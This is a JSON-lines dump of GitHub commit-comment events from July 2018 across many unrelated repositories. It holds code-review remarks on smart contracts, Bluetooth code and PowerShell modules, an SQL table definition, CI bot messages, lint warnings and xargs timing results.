{"id":"7969846717","type":"CommitCommentEvent","actor":{"login":"MariellaDev"},"repo":{"name":"AionGermany/aion-germany"},"payload":{"comment":{"id":29718405,"position":null,"line":null,"path":null,"commit_id":"a50c18feb9c641fd567d387df3caedc9f6e053d0","created_at":"2018-07-16T10:31:49Z","updated_at":"2018-07-16T10:31:49Z","author_association":"NONE","body":"Look at the sql updates for the new table from june, 06 2018 with this definition:\r\nDROP TABLE IF EXISTS `player_events_window`;\r\nCREATE TABLE `player_events_window`  (\r\n  `account_id` int(11) NULL DEFAULT NULL,\r\n  `event_id` int(11) NULL DEFAULT NULL,\r\n  `last_stamp` timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\r\n  `elapsed` double(11, 0) NULL DEFAULT 0,\r\n  PRIMARY KEY (`account_id`)\r\n) ENGINE=InnoDB DEFAULT CHARSET=utf8; "}},"created_at":"2018-07-16T10:31:49Z"}
{"id":"7969849279","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718410,"position":6,"line":6,"path":"README.md","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:32:24Z","updated_at":"2018-07-16T10:32:24Z","author_association":"COLLABORATOR","body":"I got `37214.0, 203` for this one.. don't know who is correct"}},"created_at":"2018-07-16T10:32:24Z"}
{"id":"7969849978","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29718412,"position":null,"line":null,"path":null,"commit_id":"04d938f1f2c92075f626f45dfccaa6b1a6882243","created_at":"2018-07-16T10:32:34Z","updated_at":"2018-07-16T10:32:34Z","author_association":"COLLABORATOR","body":"Die haben was geändert, passt jetzt wieder. "}},"created_at":"2018-07-16T10:32:34Z"}
{"id":"7969851456","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29718416,"position":17,"line":17,"path":"contracts/Remittance.sol","commit_id":"f040eba728124d6baf71db5a0e88b0f4f78175c7","created_at":"2018-07-16T10:32:55Z","updated_at":"2018-07-16T10:32:55Z","author_association":"OWNER","body":"At some point, I thought I'd ditch the variable _amount altogether and just refer to msg.value to update the ledger , but on second thoughts I believed it was a good idea to request the payer Alice to explicitly declare what amount she wants to process and then my contract would validate that that amount is the amount of ether attached in the transaction.\r\nPerhaps I am being sidetracked after having worked so many years in retail banking. For example, when depositing cash or cheques in a bank branch is very common for customers to be required to fill in an application how much money they are depositing. "}},"created_at":"2018-07-16T10:32:55Z"}
{"id":"7969852717","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718419,"position":7,"line":7,"path":"README.md","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:33:13Z","updated_at":"2018-07-16T10:33:13Z","author_association":"COLLABORATOR","body":"I got the same revenue but unreserved 73"}},"created_at":"2018-07-16T10:33:13Z"}
{"id":"7969853647","type":"CommitCommentEvent","actor":{"login":"igneus"},"repo":{"name":"TheBigBrainsCompany/TbbcMoneyBundle"},"payload":{"comment":{"id":29718421,"position":null,"line":null,"path":null,"commit_id":"417a94d111d97feb5453e02c5c92b575e9c41381","created_at":"2018-07-16T10:33:25Z","updated_at":"2018-07-16T10:33:25Z","author_association":"NONE","body":"I understand. I have one project using v3 and downgrading back to money 1.x is not an option, so I will probably freeze the dependency on the \"mistaken release\" until better times come (back)."}},"created_at":"2018-07-16T10:33:25Z"}
{"id":"7969855160","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718424,"position":8,"line":8,"path":"README.md","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:33:44Z","updated_at":"2018-07-16T10:33:44Z","author_association":"COLLABORATOR","body":"I got 77000$"}},"created_at":"2018-07-16T10:33:44Z"}
{"id":"7969859411","type":"CommitCommentEvent","actor":{"login":"MariuszSkamra"},"repo":{"name":"MariuszSkamra/zephyr"},"payload":{"comment":{"id":29718431,"position":25,"line":56,"path":"subsys/mgmt/smp_bt.c","commit_id":"f025d603ab107f2e9bd0aa0cc0421458dc519b07","created_at":"2018-07-16T10:34:44Z","updated_at":"2018-07-16T10:34:44Z","author_association":"OWNER","body":"That's what I thought about. I mean that I need to have a ref somewhere here. The problem is that I suspect, I'll have to take a reference on connected_cb, because doing this in this function and unref on disconnect might be broken if there are several GATT Write operations performed to this handle during one ACL connection."}},"created_at":"2018-07-16T10:34:44Z"}
{"id":"7969863740","type":"CommitCommentEvent","actor":{"login":"sivanbecker"},"repo":{"name":"Infinidat/dhcpawn"},"payload":{"comment":{"id":29718442,"position":null,"line":null,"path":null,"commit_id":"f91d914418a8295c6ab980049b9440938211c8b2","created_at":"2018-07-16T10:35:43Z","updated_at":"2018-07-16T10:35:43Z","author_association":"COLLABORATOR","body":"resolves #30 "}},"created_at":"2018-07-16T10:35:43Z"}
{"id":"7969875359","type":"CommitCommentEvent","actor":{"login":"rifatn"},"repo":{"name":"rifatn/hello-world"},"payload":{"comment":{"id":29718462,"position":null,"line":null,"path":null,"commit_id":"e6e21feff9356bacd594c0f522c5e2b93e7dfc9a","created_at":"2018-07-16T10:38:30Z","updated_at":"2018-07-16T10:38:30Z","author_association":"OWNER","body":"testing the github options and commands"}},"created_at":"2018-07-16T10:38:30Z"}
{"id":"7969875865","type":"CommitCommentEvent","actor":{"login":"pad52"},"repo":{"name":"espressif/esp-idf"},"payload":{"comment":{"id":29718463,"position":15,"line":117,"path":"examples/bluetooth/a2dp_sink/main/main.c","commit_id":"21af1d73399d5f70ca7799ef90a233e0d0e7e52c","created_at":"2018-07-16T10:38:37Z","updated_at":"2018-07-16T10:38:37Z","author_association":"NONE","body":"Thank you for making all of this possible.\r\nEven with this fix, It's not working the SPP for me in this A2DP example."}},"created_at":"2018-07-16T10:38:37Z"}
{"id":"7969876370","type":"CommitCommentEvent","actor":{"login":"AkhterTutakhil"},"repo":{"name":"AkhterTutakhil/SMSProject"},"payload":{"comment":{"id":29718464,"position":null,"line":null,"path":null,"commit_id":"c0e15a7e6c8db46803e0a20192ac5d4a362eaabc","created_at":"2018-07-16T10:38:45Z","updated_at":"2018-07-16T10:38:45Z","author_association":"OWNER","body":"accepted by ferozi\r\n"}},"created_at":"2018-07-16T10:38:45Z"}
{"id":"7969876462","type":"CommitCommentEvent","actor":{"login":"kheymann"},"repo":{"name":"kheymann/sample-cloud-native-toolchain-tutorial-20180711095018056"},"payload":{"comment":{"id":29718465,"position":null,"line":null,"path":null,"commit_id":"3a05fe24bccc4de63d7e71c7323f016d79143dfc","created_at":"2018-07-16T10:38:46Z","updated_at":"2018-07-16T10:38:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4295545d-7c62-4e10-ba0d-abbafb106524?env_id=ibm%3Ayp%3Aeu-de \"cloud-native-toolchain-tutorial-20180711095018056\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e36d8f9d-907a-4e06-913a-ecf3e7bc1d6e?env_id=ibm%3Ayp%3Aeu-de \"sample-cloud-native-toolchain-tutorial-20180711095018056\") deployed [sample-cloud-native-toolchain-tutorial-20180711095018056](https://github.com/kheymann/sample-cloud-native-toolchain-tutorial-20180711095018056/releases/tag/deploy-ibm-yp-eu-de-Katrin.Heymann_org-prod-20180716-103845 \"deploy-ibm-yp-eu-de-Katrin.Heymann_org-prod-20180716-103845\") to [prod](https://console.bluemix.net/apps/5a82ce78-0181-498b-abda-de4ac2d5fc5c?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:Katrin.Heymann_org:prod\"), including this commit"}},"created_at":"2018-07-16T10:38:46Z"}
{"id":"7969877408","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"gsbelarus/gdmn-front"},"payload":{"comment":{"id":29718469,"position":266,"line":289,"path":"src/app/scenes/app/components/NLPDialogScroll.tsx","commit_id":"1dbb27a43226148a1df689742b19d80b70f538b1","created_at":"2018-07-16T10:39:01Z","updated_at":"2018-07-16T10:39:01Z","author_association":"COLLABORATOR","body":"?"}},"created_at":"2018-07-16T10:39:01Z"}
{"id":"7969880656","type":"CommitCommentEvent","actor":{"login":"sivanbecker"},"repo":{"name":"Infinidat/dhcpawn"},"payload":{"comment":{"id":29718475,"position":null,"line":null,"path":null,"commit_id":"209f8b624e31ef56cdb44cc3ad95b0a381952532","created_at":"2018-07-16T10:39:48Z","updated_at":"2018-07-16T10:39:48Z","author_association":"COLLABORATOR","body":"resolves #31 "}},"created_at":"2018-07-16T10:39:48Z"}
{"id":"7969882787","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718477,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-16T10:40:17Z","updated_at":"2018-07-16T10:40:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:40:17Z"}
{"id":"7969889396","type":"CommitCommentEvent","actor":{"login":"HonestyXu"},"repo":{"name":"chegel/OpenCV-3.4.0-windows-x64"},"payload":{"comment":{"id":29718489,"position":null,"line":null,"path":null,"commit_id":"aadfb36a2d11876860aa71267ae7d7943b2873aa","created_at":"2018-07-16T10:41:53Z","updated_at":"2018-07-16T10:41:53Z","author_association":"NONE","body":"Thanks! It woks！"}},"created_at":"2018-07-16T10:41:53Z"}
{"id":"7969897496","type":"CommitCommentEvent","actor":{"login":"NateWr"},"repo":{"name":"Vitaliy-1/pkp-lib"},"payload":{"comment":{"id":29718504,"position":4,"line":112,"path":"locale/en_US/user.xml","commit_id":"36363e57ed26f74623cd7062304406bf683b5dfc","created_at":"2018-07-16T10:43:49Z","updated_at":"2018-07-16T10:43:49Z","author_association":"NONE","body":"I'd really like to see themes drive OJS forward, rather than just working around the parts that are missing. Otherwise these problems just languish and anyone else building a theme has to come up with their own solution.\r\n\r\nIs there any chance you could address https://github.com/pkp/pkp-lib/issues/3836 as part of your work on Classic?\r\n\r\nIf you go with this workaround for Classic, just add an `aria-describedby` attribute to the `input` field, so that the privacy statements can be accessed by those using screenreaders."}},"created_at":"2018-07-16T10:43:49Z"}
{"id":"7969899552","type":"CommitCommentEvent","actor":{"login":"mashedcode"},"repo":{"name":"Mailu/Mailu"},"payload":{"comment":{"id":29718506,"position":14,"line":16,"path":"postfix/conf/master.cf","commit_id":"a11eb4ba35530595b379ef95b239d4c04ee3e227","created_at":"2018-07-16T10:44:18Z","updated_at":"2018-07-16T10:44:18Z","author_association":"NONE","body":"But it removes submission. So how am I supposed to do submission?"}},"created_at":"2018-07-16T10:44:18Z"}
{"id":"7969901557","type":"CommitCommentEvent","actor":{"login":"almafaa"},"repo":{"name":"paypal/glamorous"},"payload":{"comment":{"id":29718510,"position":15,"line":418,"path":"src/__tests__/index.js","commit_id":"f08217bf3de868f8cab8f3a8af4d30ad6adeccf2","created_at":"2018-07-16T10:44:48Z","updated_at":"2018-07-16T10:44:48Z","author_association":"NONE","body":"مرحبا "}},"created_at":"2018-07-16T10:44:48Z"}
{"id":"7969905581","type":"CommitCommentEvent","actor":{"login":"mkh9901"},"repo":{"name":"mkh9901/Study"},"payload":{"comment":{"id":29718517,"position":null,"line":null,"path":null,"commit_id":"9e8c991ef3b7db1dc1b76a798119e438b975195b","created_at":"2018-07-16T10:45:44Z","updated_at":"2018-07-16T10:45:44Z","author_association":"OWNER","body":"공부 한 내용\r\n-기본적인 컨트랙트 작서 (솔리디티)\r\n-컨트랙트 배포\r\n-컨트랙트 실행\r\n-1.미스트 컨트랙트 -> 2.컨트랙트 작성 -> 3.Geth을 이용한 실행 -> 4. 배포(*채굴 실행) -> 5. 컨트랙트 실행\r\n\r\n*주의 사항\r\n-"}},"created_at":"2018-07-16T10:45:44Z"}
{"id":"7969910214","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29718535,"position":4,"line":30,"path":"server/graphql/proxy/index.js","commit_id":"072c4156ab854ef87b7e2d4b5455f707bfa5c81d","created_at":"2018-07-16T10:46:51Z","updated_at":"2018-07-16T10:46:51Z","author_association":"NONE","body":"低级缺陷"}},"created_at":"2018-07-16T10:46:51Z"}
{"id":"7969910214","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29718535,"position":4,"line":30,"path":"server/graphql/proxy/index.js","commit_id":"072c4156ab854ef87b7e2d4b5455f707bfa5c81d","created_at":"2018-07-16T10:46:51Z","updated_at":"2018-07-16T10:46:51Z","author_association":"NONE","body":"低级缺陷"}},"created_at":"2018-07-16T10:46:51Z"}
{"id":"7969910943","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29718537,"position":2,"line":6,"path":"server/graphql/proxy/project.js","commit_id":"072c4156ab854ef87b7e2d4b5455f707bfa5c81d","created_at":"2018-07-16T10:47:03Z","updated_at":"2018-07-16T10:47:03Z","author_association":"NONE","body":"中级缺陷"}},"created_at":"2018-07-16T10:47:03Z"}
{"id":"7969912104","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29718541,"position":null,"line":null,"path":null,"commit_id":"d25ef362ce501f7a22fb098ba681af4104c2ee46","created_at":"2018-07-16T10:47:20Z","updated_at":"2018-07-16T10:47:20Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-35](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-35).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-35-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-16T10:47:20Z"}
{"id":"7969912912","type":"CommitCommentEvent","actor":{"login":"takechi"},"repo":{"name":"takechi/Avestan"},"payload":{"comment":{"id":29718543,"position":null,"line":null,"path":null,"commit_id":"962ec440fab330e1b868724953fb9dd9c2c96582","created_at":"2018-07-16T10:47:31Z","updated_at":"2018-07-16T10:47:31Z","author_association":"OWNER","body":"cf.\r\nhttp://gakana.blog34.fc2.com/blog-entry-4.html\r\nhttp://eternalwindows.jp/shell/shellname/shellname07.html\r\nhttp://www.kab-studio.biz/Programing/Codian/ShellExtension/03.html\r\nhttps://github.com/xkou/xkcode/blob/41665e5601d6d555ae2633ac0aa8cc1108a6b6bf/2006old/TestShellWindows/TestShellWindows.cpp\r\nhttps://github.com/cosmomill/windawesome/blob/61b5138fcfbdef75afb38ed660730aad220d2bee/Helpers/Helpers.cpp\r\n"}},"created_at":"2018-07-16T10:47:31Z"}
{"id":"7969915198","type":"CommitCommentEvent","actor":{"login":"rafguns"},"repo":{"name":"swarzesherz/wos"},"payload":{"comment":{"id":29718551,"position":null,"line":null,"path":null,"commit_id":"ec0cf111357cd3b76a55154347fa866ae285c49d","created_at":"2018-07-16T10:48:05Z","updated_at":"2018-07-16T10:48:05Z","author_association":"NONE","body":"Hi, thanks for adding these new fields! Would you mind making a pull request out of this for https://github.com/rafguns/wos? Thank you!"}},"created_at":"2018-07-16T10:48:05Z"}
{"id":"7969915405","type":"CommitCommentEvent","actor":{"login":"njxjackson87"},"repo":{"name":"googleapis/googleapis"},"payload":{"comment":{"id":29718554,"position":1,"line":1,"path":"google/api/http.proto","commit_id":"ff51363884b7729ecf22481e0e9e136ea980d29e","created_at":"2018-07-16T10:48:09Z","updated_at":"2018-07-16T10:48:09Z","author_association":"NONE","body":"Ghb FFS"}},"created_at":"2018-07-16T10:48:09Z"}
{"id":"7969916586","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29718556,"position":19,"line":33,"path":"contracts/Splitter.sol","commit_id":"3513d5615032f53cf0efb7fbb5c7bc05b1398ff3","created_at":"2018-07-16T10:48:24Z","updated_at":"2018-07-16T10:48:24Z","author_association":"OWNER","body":"Done."}},"created_at":"2018-07-16T10:48:24Z"}
{"id":"7969917720","type":"CommitCommentEvent","actor":{"login":"jhedberg"},"repo":{"name":"MariuszSkamra/zephyr"},"payload":{"comment":{"id":29718558,"position":25,"line":56,"path":"subsys/mgmt/smp_bt.c","commit_id":"f025d603ab107f2e9bd0aa0cc0421458dc519b07","created_at":"2018-07-16T10:48:40Z","updated_at":"2018-07-16T10:48:40Z","author_association":"NONE","body":"You'd need a way to identify which GATT connection is for this service. With the Mesh GATT services it's done by having a custom CCC callback, however I'm not sure that will work if this service doesn't use GATT notifications (do you have a spec document for it btw?). Other option is to take the reference in the write callback and release it in the disconnect callback (after checking that there's a match."}},"created_at":"2018-07-16T10:48:40Z"}
{"id":"7969919881","type":"CommitCommentEvent","actor":{"login":"AkhterTutakhil"},"repo":{"name":"AkhterTutakhil/SMSProject"},"payload":{"comment":{"id":29718564,"position":null,"line":null,"path":null,"commit_id":"5c723f934cd9e812c9ff683ad34b81348816e6d9","created_at":"2018-07-16T10:49:12Z","updated_at":"2018-07-16T10:49:12Z","author_association":"OWNER","body":"is done by tutakhil\r\n"}},"created_at":"2018-07-16T10:49:12Z"}
{"id":"7969921763","type":"CommitCommentEvent","actor":{"login":"DengSinkiang"},"repo":{"name":"DengSinkiang/blog_sin"},"payload":{"comment":{"id":29718568,"position":7,"line":7,"path":"index.html","commit_id":"d2d16d16d8906e243fa4132bdeacdcbb47b8cd98","created_at":"2018-07-16T10:49:39Z","updated_at":"2018-07-16T10:49:39Z","author_association":"OWNER","body":"aha"}},"created_at":"2018-07-16T10:49:39Z"}
{"id":"7969922206","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29718569,"position":69,"line":50,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T10:49:45Z","updated_at":"2018-07-16T10:49:45Z","author_association":"NONE","body":"Perhaps you can review your business plan instead and say it is \"pay what you wish\" 😄 "}},"created_at":"2018-07-16T10:49:45Z"}
{"id":"7969927347","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29718581,"position":116,"line":73,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T10:50:57Z","updated_at":"2018-07-16T10:50:57Z","author_association":"NONE","body":"I don't like this `.processed` flag because it is a \"side\" check. Wouldn't `.amount > 0` be a better predictor? `amount` is the \"meat\" of the contract."}},"created_at":"2018-07-16T10:50:57Z"}
{"id":"7969928991","type":"CommitCommentEvent","actor":{"login":"akurets"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29718586,"position":80,"line":80,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-16T10:51:21Z","updated_at":"2018-07-16T10:51:21Z","author_association":"OWNER","body":"понял"}},"created_at":"2018-07-16T10:51:21Z"}
{"id":"7969929212","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29718587,"position":5,"line":9,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T10:51:24Z","updated_at":"2018-07-16T10:51:24Z","author_association":"NONE","body":"Ah right 👍 "}},"created_at":"2018-07-16T10:51:24Z"}
{"id":"7969934697","type":"CommitCommentEvent","actor":{"login":"alexkalmuk"},"repo":{"name":"embox/embox"},"payload":{"comment":{"id":29718602,"position":null,"line":null,"path":null,"commit_id":"d4ccbf158251612673176bd51009fe45ce6a6b4f","created_at":"2018-07-16T10:52:42Z","updated_at":"2018-07-16T10:52:42Z","author_association":"CONTRIBUTOR","body":"By the way, you can delete messages of the squashed commits when it is convenient. For example, there are many fixups in the final commit message. I think you can just use \"Add new test for init with one page\""}},"created_at":"2018-07-16T10:52:42Z"}
{"id":"7969937391","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"departmentfortransport/ds-r-training"},"payload":{"comment":{"id":29718606,"position":null,"line":null,"path":null,"commit_id":"725319023244156d6ece882b0194e7cf1803e27b","created_at":"2018-07-16T10:53:23Z","updated_at":"2018-07-16T10:53:23Z","author_association":"NONE","body":"[index.Rmd:44:27:](https://github.com/departmentfortransport/ds-r-training/blob/725319023244156d6ece882b0194e7cf1803e27b/index.Rmd#L44) *style:* **Only use double-quotes.**\n```r\n​mtcars[mtcars$hp > 250, c('car','mpg', 'kpl')]\n                          ^~~~~\n```\n[index.Rmd:44:33:](https://github.com/departmentfortransport/ds-r-training/blob/725319023244156d6ece882b0194e7cf1803e27b/index.Rmd#L44) *style:* **Only use double-quotes.**\n```r\n​mtcars[mtcars$hp > 250, c('car','mpg', 'kpl')]\n                                ^~~~~\n```\n[index.Rmd:44:33:](https://github.com/departmentfortransport/ds-r-training/blob/725319023244156d6ece882b0194e7cf1803e27b/index.Rmd#L44) *style:* **Commas should always have a space after.**\n```r\n​mtcars[mtcars$hp > 250, c('car','mpg', 'kpl')]\n                                ^\n```\n[index.Rmd:44:40:](https://github.com/departmentfortransport/ds-r-training/blob/725319023244156d6ece882b0194e7cf1803e27b/index.Rmd#L44) *style:* **Only use double-quotes.**\n```r\n​mtcars[mtcars$hp > 250, c('car','mpg', 'kpl')]\n                                       ^~~~~\n```"}},"created_at":"2018-07-16T10:53:23Z"}
{"id":"7969939898","type":"CommitCommentEvent","actor":{"login":"VictorJuliani"},"repo":{"name":"VictorJuliani/chartjs-plugin-zoom"},"payload":{"comment":{"id":29718611,"position":null,"line":null,"path":null,"commit_id":"2666a2c203348b6f97b1b995619cbc77cca00911","created_at":"2018-07-16T10:54:00Z","updated_at":"2018-07-16T10:54:00Z","author_association":"OWNER","body":"This is simply a change to allow zooming with mouse wheel or by dragging simultaneously. In the original version, you can only enable one of them.\r\nCan you add a repro? I'll take a look at this."}},"created_at":"2018-07-16T10:54:00Z"}
{"id":"7969941221","type":"CommitCommentEvent","actor":{"login":"vexx32"},"repo":{"name":"vexx32/PSKoans"},"payload":{"comment":{"id":29718616,"position":18,"line":18,"path":"Private/Initialize-KoanDirectory.psm1","commit_id":"55941c328dec2759b93ea35b6dcb255dfbabf8b5","created_at":"2018-07-16T10:54:19Z","updated_at":"2018-07-16T10:54:19Z","author_association":"OWNER","body":"Indentation weirdness here again, ahaha~ :)"}},"created_at":"2018-07-16T10:54:19Z"}
{"id":"7969944832","type":"CommitCommentEvent","actor":{"login":"vexx32"},"repo":{"name":"vexx32/PSKoans"},"payload":{"comment":{"id":29718618,"position":59,"line":59,"path":"Private/Write-MeditationPrompt.psm1","commit_id":"55941c328dec2759b93ea35b6dcb255dfbabf8b5","created_at":"2018-07-16T10:55:12Z","updated_at":"2018-07-16T10:55:12Z","author_association":"OWNER","body":"Editors hate these here strings, hah. Looks like I should figure out a better way to get this done."}},"created_at":"2018-07-16T10:55:12Z"}
{"id":"7969945454","type":"CommitCommentEvent","actor":{"login":"AkhterTutakhil"},"repo":{"name":"AkhterTutakhil/SMSProject"},"payload":{"comment":{"id":29718620,"position":null,"line":null,"path":null,"commit_id":"ce8d9313a887cb1f7325ba04fd02b31c153b2a69","created_at":"2018-07-16T10:55:20Z","updated_at":"2018-07-16T10:55:20Z","author_association":"OWNER","body":"is done"}},"created_at":"2018-07-16T10:55:20Z"}
{"id":"7969952970","type":"CommitCommentEvent","actor":{"login":"vexx32"},"repo":{"name":"vexx32/PSKoans"},"payload":{"comment":{"id":29718636,"position":16,"line":16,"path":"Public/Get-Enlightenment.psm1","commit_id":"55941c328dec2759b93ea35b6dcb255dfbabf8b5","created_at":"2018-07-16T10:57:06Z","updated_at":"2018-07-16T10:57:06Z","author_association":"OWNER","body":"Indentation on the help here. :)"}},"created_at":"2018-07-16T10:57:06Z"}
{"id":"7969953975","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29718641,"position":null,"line":null,"path":null,"commit_id":"4e836bbf4d100d26cfa56e136e1495199e411ba0","created_at":"2018-07-16T10:57:19Z","updated_at":"2018-07-16T10:57:19Z","author_association":"NONE","body":"You may use [0,4]"}},"created_at":"2018-07-16T10:57:19Z"}
{"id":"7969954164","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718643,"position":null,"line":null,"path":null,"commit_id":"4d5dacee78a94eb5b6eea672ead5eceea49877aa","created_at":"2018-07-16T10:57:23Z","updated_at":"2018-07-16T10:57:23Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T10:57:23Z"}
{"id":"7969954709","type":"CommitCommentEvent","actor":{"login":"mma87"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29718645,"position":18,"line":26,"path":"app/src/main/res/values/styles.xml","commit_id":"8c9cbfe5c53b2ede38ccb73d81ecbed2bd30fb46","created_at":"2018-07-16T10:57:32Z","updated_at":"2018-07-16T10:57:32Z","author_association":"NONE","body":"I had an issue with this line, I add '@' before style and after that it works\r\n"}},"created_at":"2018-07-16T10:57:32Z"}
{"id":"7969954804","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29718646,"position":null,"line":null,"path":null,"commit_id":"d607ea69ca7f70dc5153bb77396a560faf29becd","created_at":"2018-07-16T10:57:33Z","updated_at":"2018-07-16T10:57:33Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-35](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-35).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-35-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-16T10:57:33Z"}
{"id":"7969954801","type":"CommitCommentEvent","actor":{"login":"vexx32"},"repo":{"name":"vexx32/PSKoans"},"payload":{"comment":{"id":29718648,"position":48,"line":48,"path":"Public/Get-Enlightenment.psm1","commit_id":"55941c328dec2759b93ea35b6dcb255dfbabf8b5","created_at":"2018-07-16T10:57:34Z","updated_at":"2018-07-16T10:57:34Z","author_association":"OWNER","body":"Indentation~"}},"created_at":"2018-07-16T10:57:34Z"}
{"id":"7969957760","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29718661,"position":null,"line":null,"path":null,"commit_id":"4e836bbf4d100d26cfa56e136e1495199e411ba0","created_at":"2018-07-16T10:58:16Z","updated_at":"2018-07-16T10:58:16Z","author_association":"NONE","body":"This is a parameter tweak and should be launched with [0,4] bounds"}},"created_at":"2018-07-16T10:58:16Z"}
{"id":"7969959842","type":"CommitCommentEvent","actor":{"login":"versat"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":29718664,"position":null,"line":null,"path":null,"commit_id":"e46c499f5a6c552672ce246e0be8f14c9febcc51","created_at":"2018-07-16T10:58:45Z","updated_at":"2018-07-16T10:58:45Z","author_association":"COLLABORATOR","body":"It seems like the option `-n 1` is necessary to actually get it executed in parallel:\r\n```sh\r\n# no options\r\ntime find . | grep \"./lib.*cpp.dump\" | xargs python addons/naming.py --private-member-variable='m[A-Z].*'\r\nreal    5m54.536s\r\nuser    5m51.110s\r\nsys     0m2.886s\r\n\r\n# only -P 4\r\ntime find . | grep \"./lib.*cpp.dump\" | xargs -P 4  python addons/naming.py --private-member-variable='m[A-Z].*'\r\nreal    5m42.699s\r\nuser    5m40.112s\r\nsys     0m2.214s\r\n\r\n#-n 1 and -P 4\r\ntime find . | grep \"./lib.*cpp.dump\" | xargs -n 1 -P 4 python addons/naming.py --private-member-variable='m[A-Z].*'\r\nreal    1m38.156s\r\nuser    5m57.790s\r\nsys     0m15.428s\r\n```\r\nWith only `-P 4` the overall time is the same as without `-P 4`."}},"created_at":"2018-07-16T10:58:45Z"}
